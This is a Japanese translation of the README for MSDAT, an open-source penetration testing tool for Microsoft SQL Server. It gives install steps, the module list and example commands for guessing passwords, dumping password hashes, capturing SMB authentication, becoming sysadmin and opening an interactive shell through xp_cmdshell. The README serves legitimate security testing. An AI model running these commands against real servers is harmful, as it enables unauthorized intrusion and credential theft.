
MSDAT: Microsoft SQL データベース攻撃ツール
| Quentin HARDY |
|---|
| [email protected] |
| [email protected] |
MSDAT (Microsoft SQL Database Attacking Tool) は、リモートで Microsoft SQL データベースのセキュリティをテストするオープンソースのペネトレーションテストツールです。
MSDAT の使用例:
Tested on Microsof SQL database 2005, 2008, 2012, 2014, 2016 および 2019。
MSDAT (Microsoft SQL Database Attacking Tool) を使用すると、以下のことが可能です(網羅的ではありません):
MSDAT を実行するには、いくつかの依存関係をインストールする必要があります。
Ubuntu の場合:
sudo apt-get install freetds-dev
または http://www.freetds.org/ から freetds をダウンロード
Python の依存関係をインストール:
sudo pip3 install -r requirements.txt
sudo activate-global-python-argcomplete
または
sudo pip3 install cython colorlog termcolor pymssql argparse python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete
freetds 設定ファイル(例:/etc/freetds/freetds.conf または /usr/local/etc/freetds.conf)に "use ntlmv2 = yes" を追加してください。
例:
[global]
# TDS protocol version
tds version = 8.0
use ntlmv2 = yes
python3 msdat.py -h 2 ⨯
usage: msdat.py [-h] [--version]
{all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
...
_ _ __ __ _ ___
| \_/ |/ _|| \ / \|_ _|
| \_/ |\_ \| o ) o || |
|_| |_||__/|__/|_n_||_|
------------------------------------------------------
_ _ __ __ _ ___
| \_/ |/ _| | \ / \ |_ _|
| \_/ |\_ \ | o ) o | | |
|_| |_||__/icrosoft |__/atabase |_n_|ttacking |_|ool
-------------------------------------------------------
By Quentin Hardy ([email protected])
positional arguments:
{all,mssqlinfo,passwordguesser,passwordstealer,xpcmdshell,jobs,smbauthcapture,oleautomation,bulkopen,xpdirectory,trustworthype,userlikepwd,search,cleaner}
Choose a main command
all to run all modules in order to know what it is possible to do
mssqlinfo to get information without authentication
passwordguesser to know valid credentials
passwordstealer to get hashed passowrds
xpcmdshell to get a shell
jobs to execute system commands
smbauthcapture to capture a SMB authentication
oleautomation to read/write file and execute system commands
bulkopen to read a file and scan ports
xpdirectory to list files/drives and to create directories
trustworthype to become sysadmin with the trustwothy database method
userlikepwd to try each MSSQL username stored in the DB like the corresponding pwd
search to search in column names
cleaner clean local traces
optional arguments:
-h, --help show this help message and exit
--version show program's version number and exit
./msdat.py -h
./msdat.py all -h
特定のモジュールが MSSQL サーバーで使用可能かどうかは、--test-module オプションで確認できます。このオプションは各 mdat モジュールに実装されています。
all モジュールは、すべてのモジュールを実行します(購入したオプションに依存します)。
python msdat.py all -s $SERVER
以下のような場合:
./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry
各モジュールでは、--charset オプションで使用する文字セットを指定できます。
認証なしでリモート MSSQL サーバーの技術情報を取得するには:
./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info
このモジュールは、情報を取得するために TDS プロトコル と SQL Browser Server を使用します。
このモジュールは有効な認証情報を検索します:
./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search
--force-retry オプションは、各ユーザーに対して複数のパスワードを確認なしでテストします。
--accounts-file オプションで独自のアカウントファイルを指定できます:
./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry
ハッシュ化されたパスワードをダンプするには:
./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt
このモジュールは SQL Server 2000、2005、2008、2014 でテスト済みです。
xp_cmdshell を使用してシステムコマンドを実行するには(https://msdn.microsoft.com/en-us/library/ms190693.aspx):
./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell
上記のコマンドにより、リモートデータベースサーバー上で対話型シェルが利用可能になります。